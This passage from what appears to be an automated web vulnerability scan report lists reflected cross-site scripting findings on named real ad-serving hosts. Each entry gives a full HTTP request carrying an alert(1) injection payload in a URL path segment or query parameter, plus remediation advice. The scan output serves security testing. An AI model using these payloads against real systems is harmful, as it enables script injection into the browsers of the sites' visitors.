Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=49CCDDF0805E1F3B79B8DDA62CB254A9; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9e4b"-alert(1)-"80809c3de6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICKc9e4b"-alert(1)-"80809c3de6e/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77AF6CFE5EC6234805A7DAAF7F27D4BF; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:36 GMT
Connection: close
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c076e"-alert(1)-"297be020030 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5c076e"-alert(1)-"297be020030;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D7490E4F1316D12659D2939747B9E325; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:35 GMT
Connection: close
1.241. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf01"-alert(1)-"2215212b286 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?&acf01"-alert(1)-"2215212b286=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FAD174036125319C01B9C5766443D98; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:32 GMT
Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a8ed"-alert(1)-"9ea1d2dfa2b was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898?4a8ed"-alert(1)-"9ea1d2dfa2b HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=447DFF1973A285E7F493DBCC94B1C93F; Path=/ Content-Type: text/html Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dbf5"-alert(1)-"12e0cf7b4e4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com5dbf5"-alert(1)-"12e0cf7b4e4/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=F75D51DC4B4224390CEB316035A9D89F; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:33 GMT Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad3ea"-alert(1)-"7e31539aea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449ad3ea"-alert(1)-"7e31539aea6/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E2E66ABFF09E577612E681211EC6511C; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:33 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64c73"-alert(1)-"311e6476895 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/900364c73"-alert(1)-"311e6476895/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=DD246A7FD505C11EEE9444741AC8FB97; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:34 GMT Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c499e"-alert(1)-"980593a7dc0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/cac499e"-alert(1)-"980593a7dc0?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4D86B6ABDD40B4BAD1D2FFE8C8A73D0F; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:35 GMT Connection: close
The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6391"-alert(1)-"3ae5a3e1f48 was submitted in the aid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02c6391"-alert(1)-"3ae5a3e1f48&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=3AC63BF3BBDDE3C9EFF4C4CD0AE1B7CC; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:29 GMT Connection: close
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24df3"-alert(1)-"556a380bc89 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster24df3"-alert(1)-"556a380bc89&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B7E6542086595D32D2BCFC7C7C5E6B4D; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d874e"-alert(1)-"8f76ac85700 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935d874e"-alert(1)-"8f76ac85700&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B5DDC06E495E10B8505F32832C209348; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f43c4"-alert(1)-"07d3b495901 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90f43c4"-alert(1)-"07d3b495901&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E375663616B9246AF1F71BE2B9C988C5; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the js request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aaaf"-alert(1)-"261704261b0 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=101aaaf"-alert(1)-"261704261b0 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=E476E6E84728F9F552CC72B161900110; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
1.252. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://fw.adsafeprotected.com
Path:
/rjss/choices.truste.com/10449/9003/ca
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd534"-alert(1)-"dfd8c583060 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10&cd534"-alert(1)-"dfd8c583060=1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2DE02032DF9BCDEFD06A9FDA12B4EB11; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:32 GMT Connection: close
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 953fd"-alert(1)-"fc853a13bb5 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01953fd"-alert(1)-"fc853a13bb5&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=AB745F49A27F9C118C4B77DBDA5CBC4D; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:28 GMT Connection: close
The value of the plc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d49fd"-alert(1)-"4081b4f6950 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tld49fd"-alert(1)-"4081b4f6950&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=8FF3442D093E020CD38F3DBB93D3DD6A; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:31 GMT Connection: close
The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62f52"-alert(1)-"d0677c8a65a was submitted in the w parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=72862f52"-alert(1)-"d0677c8a65a&h=90&plc=tl&js=10 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7DB9AE13B83BA6BB678DE1EE54E88BED; Path=/ Content-Type: text/javascript Date: Thu, 11 Aug 2011 22:40:30 GMT Connection: close
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe0a5'%3balert(1)//ef5e54119c7 was submitted in the redir parameter. This input was echoed as fe0a5';alert(1)//ef5e54119c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=988&inv_code=ns.informit&size=728x90&imp_id=ns-10313865974_1314813273,12244bc34a8b1dc&referrer=http%3A%2F%2Fwww.informit.com%2Findex.aspx%3F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fns.informit%2Fhomepage%3Bnet%3Dns%3Bu%3D%2Cns-10313865974_1314813273%2C12244bc34a8b1dc%2Citdeweb%2Cax.{PRICEBUCKET}%3B%3Bppos%3Datf%3Bkw%3D%3Btile%3D1%3Bcmw%3Dnurl%3Bsz%3D728x90%3Bnet%3Dns%3Bord1%3D418181%3Bcontx%3Ditdeweb%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D3538776447530836%3F%3Ffe0a5'%3balert(1)//ef5e54119c7 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.informit.com/index.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
